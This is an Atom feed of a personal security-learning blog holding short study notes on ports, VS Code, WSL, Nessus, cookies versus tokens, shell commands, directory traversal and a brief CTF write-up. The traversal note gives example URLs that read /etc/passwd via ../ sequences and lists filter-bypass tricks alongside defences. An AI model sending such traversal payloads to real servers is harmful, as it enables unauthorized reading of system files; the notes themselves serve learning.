<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="/atom.xml" rel="self"/>
<link href="https://singlemindedt.github.io/"/>
<updated>2020-10-30T07:32:44.759Z</updated>
<id>https://singlemindedt.github.io/</id>
<author>
<name>Smtsec</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Default Ports for HTTP, HTTPS and Other Protocols</title>
<link href="https://singlemindedt.github.io/2020/10/30/HTTPHTTPS%E7%AD%89%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3/"/>
<id>https://singlemindedt.github.io/2020/10/30/HTTPHTTPS等默认端口/</id>
<published>2020-10-30T07:17:02.000Z</published>
<updated>2020-10-30T07:32:44.759Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://blog.csdn.net/qiucheng_198806/article/details/87375505" target="_blank" rel="noopener">Common default port numbers for HTTP, HTTPS and other protocols</a></p></blockquote>]]></content>
<summary type="html">
<blockquote>
<p><a href="https://blog.csdn.net/qiucheng_198806/article/details/87375505" target="_blank" rel="noopener">Common default port numbers for HTTP, HTTPS and other protocols<
</summary>
</entry>
<entry>
<title>Setting up a VS Code Run Environment</title>
<link href="https://singlemindedt.github.io/2020/10/29/vscode%E9%85%8D%E7%BD%AE%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/"/>
<id>https://singlemindedt.github.io/2020/10/29/vscode配置运行环境/</id>
<published>2020-10-28T16:00:00.000Z</published>
<updated>2020-10-29T08:21:15.821Z</updated>
<content type="html"><![CDATA[<h2 id="1-MinGW下载和安装教程"><a href="#1-MinGW下载和安装教程" class="headerlink" title="1. MinGW download and installation guide"></a><a href="http://c.biancheng.net/view/8077.html" target="_blank" rel="noopener">1. MinGW download and installation guide</a></h2><h2 id="2-VS-Code运行C和C-程序"><a href="#2-VS-Code运行C和C-程序" class="headerlink" title="2. Running C and C++ programs in VS Code"></a><a href="http://c.biancheng.net/view/8114.html" target="_blank" rel="noopener">2. Running C and C++ programs in VS Code</a></h2><h2 id="3-重启VScode"><a href="#3-重启VScode" class="headerlink" title="3. Restart VS Code"></a>3. Restart VS Code</h2>]]></content>
<summary type="html">
<h2 id="1-MinGW下载和安装教程"><a href="#1-MinGW下载和安装教程" class="headerlink" title="1. MinGW download and installation guide"></a><a href="http://c.biancheng.net/view/8077.ht
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>WSL</title>
<link href="https://singlemindedt.github.io/2020/09/17/WSL/"/>
<id>https://singlemindedt.github.io/2020/09/17/WSL/</id>
<published>2020-09-17T14:31:16.000Z</published>
<updated>2020-09-20T07:57:12.065Z</updated>
<content type="html"><![CDATA[<h2 id="1-WSL存在目录:"><a href="#1-WSL存在目录:" class="headerlink" title="1. Where the WSL root file system lives:"></a>1. Where the WSL root file system lives:</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\xxx\AppData\Local\Packages\KaliLinux\LocalState\rootfs</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/luansj/article/details/97272672" target="_blank" rel="noopener">https://blog.csdn.net/luansj/article/details/97272672</a></p><hr><h2 id="2-无法执行一些系统命令:"><a href="#2-无法执行一些系统命令:" class="headerlink" title="2. Some system commands cannot be run:"></a>2. Some system commands cannot be run:</h2><p>For example <code>shutdown -h now</code> (shut down the system) fails with:</p><blockquote><p>🐖:</p><p>系统尚未以systemd作为init System(PID 1)启动。无法操作。</p><p>无法连接到总线:主机已关闭</p></blockquote><h2 id="3-个人主目录"><a href="#3-个人主目录" class="headerlink" title="3. Personal home directory"></a>3. Personal home directory</h2><p>Located under the user's own directory inside the home directory;</p>]]></content>
<summary type="html">
<h2 id="1-WSL存在目录:"><a href="#1-WSL存在目录:" class="headerlink" title="1. Where the WSL root file system lives:"></a>1. Where the WSL root file system lives:</h2><figure class="highlight sh"
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>Nessus</title>
<link href="https://singlemindedt.github.io/2020/09/17/Nessus/"/>
<id>https://singlemindedt.github.io/2020/09/17/Nessus/</id>
<published>2020-09-17T04:11:38.000Z</published>
<updated>2020-09-17T04:23:40.934Z</updated>
<content type="html"><![CDATA[<p>Notes on problems encountered while installing Nessus:</p><p><font color="#ff0000">Plugin installation failed</font></p><p>Go to the installation directory and run <code>nessuscli update</code> (make sure the network connection is good)</p><p>Then visit <code>https://localhost:8834/#/</code>;</p><p><em>None of the other methods found online worked :slightly_smiling_face:</em></p><hr><blockquote><p>See also:</p><p><a href="https://blog.csdn.net/qq_44342688/article/details/104511557" target="_blank" rel="noopener">Nessus plugin download error on Windows 10</a></p></blockquote>]]></content>
<summary type="html">
<p>Notes on problems encountered while installing Nessus:</p>
<p><font color="#ff0000">Plugin installation failed</font></p>
<p>Go to the installation directory and run <code>nessuscli update</code> (make sure the network connection is good)</p>
<p>Then visit <code>http
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>Cookie, Session, Token</title>
<link href="https://singlemindedt.github.io/2020/09/11/cookie/"/>
<id>https://singlemindedt.github.io/2020/09/11/cookie/</id>
<published>2020-09-11T08:59:48.000Z</published>
<updated>2020-09-14T06:45:48.381Z</updated>
<content type="html"><![CDATA[<p>🐖:</p><p>HTTP is a <font color="#ff0000">stateless protocol</font>: the current request has no relation to the previous one;</p><blockquote><p>For example: I log in at www.a.com/login.php and want www.a.com/index.php to treat me as logged in too, but these are two different pages, i.e. two different HTTP requests, and the two requests are stateless, i.e. unrelated, so index.php cannot simply tell that the user already logged in at login.php! (ref. 3)</p></blockquote><h3 id="1-session"><a href="#1-session" class="headerlink" title="1. session"></a>1. session</h3><h4 id="理解:"><a href="#理解:" class="headerlink" title="Concept:"></a>Concept:</h4><p>A session-control mechanism that stores the connection state; a marker for the connection;</p><p>Like a state table kept on the server;</p><p>Purpose: to provide persistence on top of stateless HTTP;</p><p>Servers usually implement sessions via cookies; the cookie carries the session identifier;</p><h4 id="过程:"><a href="#过程:" class="headerlink" title="Flow:"></a>Flow:</h4><ul><li>The client sends a request</li><li>The server checks whether a session exists (creates one if not, reuses it otherwise); the server keeps the session temporarily and destroys it after the user leaves the site</li></ul><hr><blockquote><h4 id="关键区别"><a href="#关键区别" class="headerlink" title="Key differences"></a>Key differences</h4><ul><li>Cookies are client-side files containing user information, whereas sessions are server-side files containing user information.</li><li>Cookies do not depend on sessions, but sessions depend on cookies.</li><li>A cookie's expiry depends on the lifetime you set for it, whereas a session ends when the user closes the browser.</li><li>A cookie holds at most 4KB, whereas a session can store any amount of data; the only limit is the maximum memory a script may consume at once, 128MB by default</li><li>Cookies have no unsetcookie() function, whereas for sessions you can call Session_destroy(); to destroy all registered data, or unset individual values</li><li>Cookies need not be started, since they are stored on the local machine, whereas for sessions in PHP you must call session_start(); before using $_SESSION. The same applies in other languages</li></ul></blockquote><hr><h3 id="2-cookie"><a href="#2-cookie" class="headerlink" title="2. cookie"></a>2. cookie</h3><p><font color="#ff0000">Session-based authentication</font></p><h4 id="理解:-1"><a href="#理解:-1" class="headerlink" title="Concept:"></a>Concept:</h4><ul><li>Purpose: to keep an active state with the server</li><li>Form: stored as text files in the browser's directory</li><li>Cookies have a lifetime<ul><li>Cookie management:<ul><li>Persistent (stored on local disk)</li><li>Non-persistent (stored in memory)</li></ul></li></ul></li><li><strong>Sessions are stored in server memory; with many concurrent users this puts load on the server;</strong></li><li>Cookie-based authentication is <font color="#ff0000">stateful</font> -> <strong>both the server and the client keep an authentication record or session</strong>;</li></ul><h4 id="过程:-1"><a href="#过程:-1" class="headerlink" title="Flow:"></a>Flow:</h4><ul><li>The client sends a request<ul><li>The user logs in with username/password</li></ul></li><li>The server receives the request and returns a response carrying a Set-Cookie header<ul><li>The server verifies the credentials, creates a session for the user and stores it in the database</li><li><strong>The session ID is stored in a cookie in the user's browser</strong> (the size is limited by the browser, usually under 4KB)</li></ul></li><li>The client sends further requests (including the cookie, which the server uses to uniquely identify the client); the server receives them and verifies the user's identity<ul><li>While the user stays logged in, the cookie is sent with every subsequent request</li><li><strong>The server compares the session ID from the cookie with the session data held in memory (or the database) to verify the user's identity, then sends a response with the appropriate status</strong></li></ul></li><li>When the client logs out, the session is deleted on the client and from the server database;</li></ul><p><img src="https://s1.ax1x.com/2020/09/14/wDmSOI.png" alt="wDmSOI.png"></p><hr><h3 id="3-token"><a href="#3-token" class="headerlink" title="3. token"></a>3. token</h3><p><font color="#ff0000">JWT (JSON Web Token): token-based authentication</font></p><h4 id="理解:-2"><a href="#理解:-2" class="headerlink" title="Concept:"></a>Concept:</h4><p>Token-based authentication is <font color="#ff0000">stateless</font> -> the server keeps no session information;</p><p>Access token</p><p>Composition: uid (the user's unique identifier), time (a timestamp of the current time), sign (a signature: the preceding fields of the token plus a salt, hashed into a fixed-length hex string, so that a malicious third party cannot assemble a token of its own and present it to the server).</p><h4 id="过程:-2"><a href="#过程:-2" class="headerlink" title="Flow:"></a>Flow:</h4><ul><li>The user sends a request<ul><li>The user logs in with username/password</li></ul></li><li>The server receives the request, verifies the credentials, creates a signed token and returns it to the client in the response</li><li>The client receives the response, stores the token in local storage, session storage or a cookie, and attaches it to every subsequent request</li><li>The server receives the request, checks and decodes the token signature, extracts the user information from the token and finally responds to the client (the token is included as an extra Authorization header or via one of the other methods above)<ul><li>The server decodes the token<ul><li>Token valid: process the request and send the response</li><li>User logs out: the client discards the token (no interaction with the server needed)</li></ul></li></ul></li></ul><p><img src="https://s1.ax1x.com/2020/09/14/wDeIyR.png" alt="wDeIyR.png"></p><h4 id="优点:"><a href="#优点:" class="headerlink" title="Advantages:"></a>Advantages:</h4><p>Token authentication is stateless; the backend does not have to keep token records;</p><p>Each token is self-contained, carrying all the data about its validity and the user;</p><p>The server only has to sign the token on a successful login request and verify the token's validity afterwards;</p><hr><blockquote><p>References:</p><ol><li><a href="https://www.cnblogs.com/moyand/p/9047978.html" target="_blank" rel="noopener">Thoroughly understanding cookie, session and token</a></li><li><a href="https://segmentfault.com/a/1190000017831088" target="_blank" rel="noopener">Fully understanding session, cookie and token</a></li><li><a href="https://www.jianshu.com/p/bd1be47a16c1" target="_blank" rel="noopener">A few things about Cookie, Session and Token (original)</a></li><li><a href="https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" target="_blank" rel="noopener">Session vs Token Based Authentication</a></li><li><a href="https://medium.com/better-programming/json-web-tokens-vs-session-cookies-for-authentication-55a5ddafb435" target="_blank" rel="noopener">JSON Web Tokens vs. Session Cookies for Authentication</a></li><li><a href="https://dzone.com/articles/cookies-vs-tokens-the-definitive-guide" target="_blank" rel="noopener">Cookies vs. Tokens: The Definitive Guide</a></li><li><a href="https://www.guru99.com/difference-between-cookie-session.html" target="_blank" rel="noopener">Difference between Cookie and Session</a></li></ol></blockquote>]]></content>
<summary type="html">
<p>🐖:</p>
<p>HTTP is a <font color="#ff0000">stateless protocol</font>: the current request has no relation to the previous one;</p>
<blockquote>
<p>比如:我在<a href="http://www.a.com/login.php里面登陆了,
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>Common Command-Line File Operations</title>
<link href="https://singlemindedt.github.io/2020/09/10/CD/"/>
<id>https://singlemindedt.github.io/2020/09/10/CD/</id>
<published>2020-09-10T05:27:08.000Z</published>
<updated>2020-09-20T07:56:26.002Z</updated>
<content type="html"><![CDATA[<h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><h3 id="1、进入盘符"><a href="#1、进入盘符" class="headerlink" title="1. Change drive"></a>1. Change drive</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">rem Type the target drive letter followed by a colon</span><br><span class="line">rem e.g. switch to drive F:</span><br><span class="line">f:</span><br><span class="line">F:</span><br></pre></td></tr></table></figure><h3 id="2、进入指定目录"><a href="#2、进入指定目录" class="headerlink" title="2. Change to a given directory"></a>2. Change to a given directory</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">rem cd into a first-level subdirectory, or into a full path</span><br><span class="line">cd dirname</span><br><span class="line">cd path\to\dir</span><br><span class="line">rem To open a file in the current directory no cd is needed, e.g.:</span><br><span class="line">XXX.txt</span><br></pre></td></tr></table></figure><hr><h3 id="3、利用-d参数直接进入某盘下某目录"><a href="#3、利用-d参数直接进入某盘下某目录" class="headerlink" title="3. Use /d to change drive and directory at once"></a>3. Use /d to change drive and directory at once</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rem e.g. go to the tools directory on drive F:</span><br><span class="line">cd /d f:\tools</span><br></pre></td></tr></table></figure><hr><h3 id="4、返回上级目录"><a href="#4、返回上级目录" class="headerlink" title="4. Go to the parent directory"></a>4. Go to the parent directory</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd ..</span><br></pre></td></tr></table></figure><h3 id="5、返回当前盘根目录"><a href="#5、返回当前盘根目录" class="headerlink" title="5. Go to the root of the current drive"></a>5. Go to the root of the current drive</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /</span><br><span class="line">cd \</span><br></pre></td></tr></table></figure><h3 id="6、dir命令查看该目录下文件及子目录列表详细信息"><a href="#6、dir命令查看该目录下文件及子目录列表详细信息" class="headerlink" title="6. dir lists the files and subdirectories of a directory in detail"></a>6. dir lists the files and subdirectories of a directory in detail</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dir</span><br><span class="line">dir /a *</span><br></pre></td></tr></table></figure><h3 id="7、ls列出当前目录下所有一级目录"><a href="#7、ls列出当前目录下所有一级目录" class="headerlink" title="7. ls lists all first-level entries of the current directory"></a>7. ls lists all first-level entries of the current directory</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls</span><br></pre></td></tr></table></figure><h3 id="8、通过在命令后加-查看命令用法"><a href="#8、通过在命令后加-查看命令用法" class="headerlink" title="8. Append /? to a command to see its usage"></a>8. Append <code>/?</code> to a command to see its usage</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir /?</span><br></pre></td></tr></table></figure><hr><h2 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h2><h3 id="1、-关机重启注销"><a href="#1、-关机重启注销" class="headerlink" title="1. Shutdown, reboot, logout"></a>1. Shutdown, reboot, logout</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">shutdown -h now              # shut down the system</span><br><span class="line">init 0                       # shut down the system</span><br><span class="line">telinit 0                    # shut down the system</span><br><span class="line">shutdown -h hours:minutes &amp;  # shut down at the scheduled time</span><br><span class="line">shutdown -c                  # cancel a scheduled shutdown</span><br><span class="line">shutdown -r now              # reboot</span><br><span class="line">reboot                       # reboot</span><br><span class="line">logout                       # log out</span><br></pre></td></tr></table></figure><h3 id="2-文件操作"><a href="#2-文件操作" class="headerlink" title="2. File operations"></a>2. File operations</h3><h4 id="cd"><a href="#cd" class="headerlink" title="cd"></a>cd</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">cd /            # go to the root directory</span><br><span class="line">cd              # go to your own home directory</span><br><span class="line">cd ..           # go up one level</span><br><span class="line">cd ../..        # go up two levels</span><br><span class="line">cd ~username    # go to that user's home directory</span><br><span class="line">cd -            # go back to the previous directory</span><br><span class="line">cd ./path       # go to the path directory under the current directory; "." is the current directory</span><br><span class="line">cd ../path      # go to the path directory under the parent directory; ".." is the parent directory</span><br><span class="line">cd /home/will   # go to /home/will</span><br></pre></td></tr></table></figure><h4 id="ls"><a href="#ls" class="headerlink" title="ls"></a>ls</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">ls : list the files in a directory</span><br><span class="line">-a : list all entries, including hidden ones (names starting with .)</span><br><span class="line">-A : list all entries including hidden ones, but not the . and .. directories</span><br><span class="line">-d : list the directory itself rather than its contents</span><br><span class="line">-f : list without sorting (ls sorts by name by default)</span><br><span class="line">-F : append an indicator to each name according to its type, e.g.</span><br><span class="line">     * executable; / directory; = socket; | FIFO</span><br><span class="line">-h : print sizes in human-readable units (GB, KB, ...)</span><br><span class="line">-i : print the inode number instead of the file attributes</span><br><span class="line">-l : long listing, including the file attributes</span><br><span class="line">-n : print numeric UID and GID instead of user and group names</span><br><span class="line">-r : reverse the sort order, e.g. names from large to small instead of small to large</span><br><span class="line">-R : list subdirectories recursively</span><br><span class="line">-S : sort by file size</span><br><span class="line">-t : sort by time</span><br><span class="line">--color=never  : do not colour output by file type</span><br><span class="line">--color=always : always colour output</span><br><span class="line">--color=auto   : let the system decide from its settings whether to colour output</span><br><span class="line">--full-time    : print the full timestamp (year, month, day, hour, minute)</span><br><span class="line">--time={atime,ctime} : show the access time or the status-change time (ctime)</span><br><span class="line">                       instead of the content modification time</span><br><span class="line"></span><br><span class="line">Examples:</span><br><span class="line">ls [-aAdfFhilRS] dirname</span><br><span class="line">ls [--color={none,auto,always}] dirname</span><br><span class="line">ls [--full-time] dirname</span><br></pre></td></tr></table></figure><h4 id="pwd"><a href="#pwd" class="headerlink" title="pwd"></a>pwd</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pwd             # print the working directory</span><br></pre></td></tr></table></figure><h4 id="find"><a href="#find" class="headerlink" title="find"></a>find</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">find dirname              # search the given directory</span><br><span class="line"></span><br><span class="line"># -name : pattern that the file or directory names must match</span><br><span class="line">find /home/ -name 'a*'    # files and directories under /home whose names start with a; * is a wildcard, keep the pattern in single quotes</span><br></pre></td></tr></table></figure><h4 id="touch"><a href="#touch" class="headerlink" title="touch"></a>touch</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">touch 1.txt     # create 1.txt in the current directory</span><br></pre></td></tr></table></figure><h4 id="mkdir"><a href="#mkdir" class="headerlink" title="mkdir"></a>mkdir</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mkdir aaa               # create directory aaa in the current directory (requires administrator privileges)</span><br><span class="line">mkdir /home/aaa         # create directory aaa under /home</span><br><span class="line">mkdir -pv /home/a/b/c   # create nested directories under /home</span><br><span class="line"># -p : create missing parent directories first</span><br><span class="line"># -v : print details of what the command does</span><br></pre></td></tr></table></figure><p>🐖: press Tab to complete file names</p><h4 id="vi-vim"><a href="#vi-vim" class="headerlink" title="vi/vim"></a>vi/vim</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vi filename   opens the file in normal mode</span><br><span class="line">i             enter insert mode</span><br><span class="line">Esc           return to normal mode</span><br><span class="line">:wq           in normal mode: save and quit</span><br></pre></td></tr></table></figure><h4 id="rm"><a href="#rm" class="headerlink" title="rm"></a>rm</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">rm : remove files or directories</span><br><span class="line">Syntax: rm [-dfirv][--help][--version][file or directory...]</span><br><span class="line">-f or --force : force removal of files or directories</span><br><span class="line">-r, -R or --recursive : recursive; process all files and subdirectories under the given directory</span><br><span class="line">Force-remove a file:      rm -f ./1.txt</span><br><span class="line">Force-remove a directory: rm -rf ./a</span><br></pre></td></tr></table></figure><h4 id="管道"><a href="#管道" class="headerlink" title="Pipes"></a>Pipes</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Pipe</span><br><span class="line">command1 | command2 : run command2 with the output of command1 as its input</span><br></pre></td></tr></table></figure><h4 id="ps"><a href="#ps" class="headerlink" title="ps"></a>ps</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ps -ef : show all current processes (a snapshot taken at the moment ps runs)</span><br><span class="line">Format: ps [options]</span><br><span class="line">-e : same as the A option; show all processes</span><br><span class="line">-f : full format; show the UID, PPID, C and STIME columns</span><br><span class="line">Example: ps -ef | grep -i mysql : filter for the mysql process</span><br></pre></td></tr></table></figure><h4 id="kill"><a href="#kill" class="headerlink" title="kill"></a>kill</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kill : terminate a running program or job</span><br><span class="line">Syntax: kill [options] [pid]</span><br><span class="line">-l &lt;signal number&gt; : without a number, -l lists all signal names.</span><br><span class="line">kill -9 : force termination (SIGKILL)</span><br><span class="line">Format: kill -9 pid</span><br><span class="line">Find the pid of the process with ps -ef first, then terminate it with kill -9 pid</span><br></pre></td></tr></table></figure><h4 id="chmod"><a href="#chmod" class="headerlink" title="chmod"></a>chmod</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">chmod : change the permissions of a file or directory</span><br><span class="line"></span><br><span class="line">Syntax: chmod [options] [&lt;scope&gt;&lt;operator&gt;&lt;permission&gt;]</span><br><span class="line">-R or --recursive : recursive; process all files and subdirectories under the given directory</span><br><span class="line">-- scope:</span><br><span class="line">u : user, the owner of the file or directory</span><br><span class="line">g : group, the group that owns the file or directory</span><br><span class="line">o : other, every user who is neither the owner nor in the owning group</span><br><span class="line">a : all users: owner, group and others.</span><br><span class="line">-- operator:</span><br><span class="line">+ : add a permission</span><br><span class="line">- : remove a permission</span><br><span class="line">-- permission codes:</span><br><span class="line">r : read, numeric value 4</span><br><span class="line">w : write, numeric value 2</span><br><span class="line">x : execute (or traverse, for directories), numeric value 1</span><br><span class="line">- : no permission, numeric value 0</span><br><span class="line">777 : all permissions for everyone</span><br><span class="line">[Note]: 3 = 1+2 (wx), 5 = 4+1 (rx)</span><br><span class="line"></span><br><span class="line">Examples:</span><br><span class="line">chmod u-rwx xxx   remove read/write/execute from the owner of directory xxx</span><br><span class="line">chmod g-rwx xxx   remove read/write/execute from the group of directory xxx</span><br><span class="line">chmod 777 xxx     grant all permissions on directory xxx to everyone</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><h3 id="1、进入盘符"><a href="#1、进入盘符" class=
</summary>
<category term="命令" scheme="https://singlemindedt.github.io/tags/%E5%91%BD%E4%BB%A4/"/>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>Directory Traversal Vulnerabilities</title>
<link href="https://singlemindedt.github.io/2020/08/24/%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E/"/>
<id>https://singlemindedt.github.io/2020/08/24/目录穿越漏洞/</id>
<published>2020-08-24T01:42:05.000Z</published>
<updated>2020-08-24T04:53:15.868Z</updated>
<content type="html"><![CDATA[<h2 id="1-目录穿越"><a href="#1-目录穿越" class="headerlink" title="1. Directory traversal"></a>1. Directory traversal</h2><p>The goal of directory traversal is to access files or directories that lie outside the web root. By browsing the application, an attacker can work out relative paths to other files stored on the web server. If an attacker can reach files or directories on the application server or another backend file system, a path traversal vulnerability is present: walking up the tree with <code>..\</code> gives access to arbitrary files on the server.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">On Unix systems, ../ is the standard syntax for the parent directory;</span><br><span class="line"></span><br><span class="line">On Windows, both ../ and ..\ refer to the parent directory.</span><br></pre></td></tr></table></figure><h2 id="2-一般形式:"><a href="#2-一般形式:" class="headerlink" title="2. Typical form:"></a>2. Typical form:</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://***/go.action?file=..\..\etc\passwd</span><br><span class="line">https://www.*****.com/loadImage?filename=../../../etc/passwd</span><br></pre></td></tr></table></figure><h2 id="3-绕过方法:"><a href="#3-绕过方法:" class="headerlink" title="3. Bypass techniques:"></a>3. Bypass techniques:</h2><ol><li>Absolute paths</li><li>Doubling <code>../</code></li><li>URL encoding</li><li>Absolute path + <code>../</code></li><li>Truncating the file extension with %00</li><li>Unicode encoding</li></ol><h2 id="4-防御:"><a href="#4-防御:" class="headerlink" title="4. Defences:"></a>4. Defences:</h2><ol><li>Whitelist the allowed input values</li><li>Set open_basedir in php.ini</li><li>Filter the key sequence <code>../</code></li></ol><h2 id="5-参考:"><a href="#5-参考:" class="headerlink" title="5. References:"></a>5. References:</h2><ol><li><p><a href="https://blog.csdn.net/angry_program/article/details/107855078" target="_blank" rel="noopener">Directory traversal vulnerabilities</a></p></li><li><p><a href="https://www.cnblogs.com/vo-ov/p/3745651.html" target="_blank" rel="noopener">Web security (13): Directory Traversal vulnerabilities</a></p></li><li><p><a href="https://www.lstazl.com/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">Arbitrary file read vulnerabilities</a></p></li><li><p><a href="http://wp.blkstone.me/2018/06/abusing-arbitrary-file-read/#5" target="_blank" rel="noopener">Deep exploitation of arbitrary file read</a></p></li><li><p><a href="https://www.cdxy.me/?p=554" target="_blank" rel="noopener">Vulnerability notes: arbitrary file read</a></p></li><li><p><a href="https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/" target="_blank" rel="noopener">Directory traversal, file inclusion and the proc file system</a></p></li><li><p><a href="http://xdxd.love/2016/05/23/一个任意文件读取漏洞分析/" target="_blank" rel="noopener">Notes on an arbitrary file read vulnerability</a></p></li></ol>]]></content>
<summary type="html">
<h2 id="1-目录穿越"><a href="#1-目录穿越" class="headerlink" title="1. 目录穿越"></a>1. Directory Traversal</h2><p>The goal of directory traversal is to access files or directories that lie outside the web root. By browsing the application, an attacker can look for relative paths to other files stored on the web server
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
<category term="security" scheme="https://singlemindedt.github.io/tags/security/"/>
</entry>
<entry>
<title>CTFHub-wp</title>
<link href="https://singlemindedt.github.io/2020/08/12/CTFHub-wp/"/>
<id>https://singlemindedt.github.io/2020/08/12/CTFHub-wp/</id>
<published>2020-08-12T05:42:00.000Z</published>
<updated>2020-08-24T04:25:09.339Z</updated>
<content type="html"><![CDATA[<p>Directory traversal</p><p>Clicking the <code>点击开始寻找flag</code> ("click to start looking for the flag") button shows the directory listing directly; the flag is found under flag_in_here/4/2.</p><blockquote><p>This challenge gives the attacker direct access to the directory listing, so simply walking through it and searching is enough.</p></blockquote>]]></content>
<summary type="html">
<p>Directory traversal</p>
<p>Clicking the <code>点击开始寻找flag</code> ("click to start looking for the flag") button shows the directory listing directly; the flag is found under flag_in_here/4/2.</p>
<blockquote>
